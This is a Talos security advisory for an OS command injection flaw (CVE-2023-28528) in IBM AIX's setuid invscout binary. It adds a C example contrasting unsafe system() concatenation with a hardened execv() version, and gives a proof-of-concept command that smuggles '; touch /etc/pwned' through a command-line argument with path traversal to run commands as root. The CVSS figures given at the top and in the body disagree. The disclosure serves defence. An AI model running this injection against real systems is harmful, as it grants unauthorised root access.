IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability

Talos Intelligence
www.talosintelligence.com

8.4 High (CVSS3)

Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.002 Low (percentile 57.0%)

Talos Vulnerability Report

TALOS-2023-1691

IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability

April 24, 2023
CVE Number

CVE-2023-28528

SUMMARY

An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially crafted command-line argument can lead to the execution of a privileged operation, resulting in arbitrary code execution. An attacker can pass such an argument to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

IBM Corporation AIX 7.2

PRODUCT URLS

AIX - <http://us.ibm.com>

CVSSv3 SCORE

5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

DETAILS

AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.

The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().
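The pattern the advisory describes, as an added example that is not IBM's code (the invscout source is not on this page): a command line built by concatenating caller-controlled values and handed to system(), beside a hardened replacement that allow-lists the package name and runs rpm through execv() with an argument vector, so no shell ever re-parses the input. The microcode directory prefix is taken from the PoC output; the function names, the fixed rpm path and the constructed inputs are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Directory prefix seen in the advisory's PoC output; everything else
 * here (function names, the fixed rpm path) is an assumption. */
#define MICROCODE_DIR "/var/adm/invscout/microcode/"
#define RPM_PATH      "/usr/bin/rpm"

/* VULNERABLE pattern (what the advisory describes): the caller-supplied
 * option string and package path are pasted into one command line that is
 * later handed to system().  The shell re-parses that line, so a ';' or
 * '`' in either value becomes a second command run with the setuid
 * binary's effective privileges. */
int build_install_command_vulnerable(const char *rpm_arg, const char *opts,
                                     char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s %s %s%s", RPM_PATH, opts, MICROCODE_DIR, rpm_arg);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return 0;                     /* the original would now call system(out) */
}

/* Demo helper: does a ';' in the option string survive into the command line? */
int vulnerable_keeps_metachar(const char *opts)
{
    char cmd[512];
    if (build_install_command_vulnerable("x.rpm", opts, cmd, sizeof cmd) != 0) return -1;
    return strchr(cmd, ';') != NULL;
}

/* HARDENED step 1: accept only a bare package file name.  The allow-list
 * excludes '/', so "../" traversal out of MICROCODE_DIR is impossible, and
 * excludes every shell metacharacter, space and quote. */
int validate_rpm_name(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._+-";
    size_t len = strlen(name);
    if (len < 5 || len > 255) return -1;                 /* shortest valid is "x.rpm" */
    if (name[0] == '.' || name[0] == '-') return -1;     /* no "..", no option-like names */
    if (strspn(name, allowed) != len) return -1;
    if (strcmp(name + len - 4, ".rpm") != 0) return -1;
    return 0;
}

/* HARDENED step 2: build an argv for execv().  Each array element is one
 * argument, so nothing is ever re-parsed as shell syntax, and the rpm mode
 * ("-i") is fixed by the program rather than taken from the caller. */
int build_install_argv(const char *rpm_name, char *pathbuf, size_t pathlen, char *argv_out[4])
{
    if (validate_rpm_name(rpm_name) != 0) return -1;
    int n = snprintf(pathbuf, pathlen, "%s%s", MICROCODE_DIR, rpm_name);
    if (n < 0 || (size_t)n >= pathlen) return -1;
    argv_out[0] = RPM_PATH;
    argv_out[1] = "-i";
    argv_out[2] = pathbuf;
    argv_out[3] = NULL;
    return 0;
}

/* Demo helper: 1 if the name is accepted and resolves under MICROCODE_DIR, 0 if rejected. */
int hardened_accepts(const char *rpm_name)
{
    char path[512];
    char *argv[4];
    if (build_install_argv(rpm_name, path, sizeof path, argv) != 0) return 0;
    return strncmp(argv[2], MICROCODE_DIR, strlen(MICROCODE_DIR)) == 0;
}

/* HARDENED step 3: run rpm without a shell.  Returns rpm's exit status, or
 * -1 if the name was rejected or the process could not be started. */
int run_rpm_install(const char *rpm_name)
{
    char path[512];
    char *argv[4];
    int status;
    if (build_install_argv(rpm_name, path, sizeof path, argv) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);     /* no /bin/sh involved */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input modelled on the shape of the advisory's -o value. */
    const char *poc_opts = "-i ../../../../../home/tmb/x.rpm; touch /etc/pwned; echo ";
    printf("vulnerable builder keeps ';': %d\n", vulnerable_keeps_metachar(poc_opts));
    printf("hardened accepts traversal name: %d\n", hardened_accepts("../../../../../home/tmb/x.rpm"));
    printf("hardened accepts plain name: %d\n", hardened_accepts("info-6.7-1.aix5.1.ppc.rpm"));
    return 0;
}
```

The two properties that matter for a setuid helper are visible in the hardened path: the program, not the caller, decides which rpm mode runs, and the only caller-controlled byte sequence is a file name that has passed an allow-list and is joined to a fixed directory, so neither a second command nor a path outside the microcode directory can be expressed at all.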

Exploit Proof of Concept

The most trivial method of exploitation to gain command execution takes the following form:

$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo "
package info-6.7-1.ppc is already installed
/var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm
$ ls -la /etc/pwned
-rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned

Note: The umask is set to 0 prior to exploitation commencing.

TIMELINE

2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release

Credit

Discovered by Tim Brown of Cisco Security Advisory EMEAR.
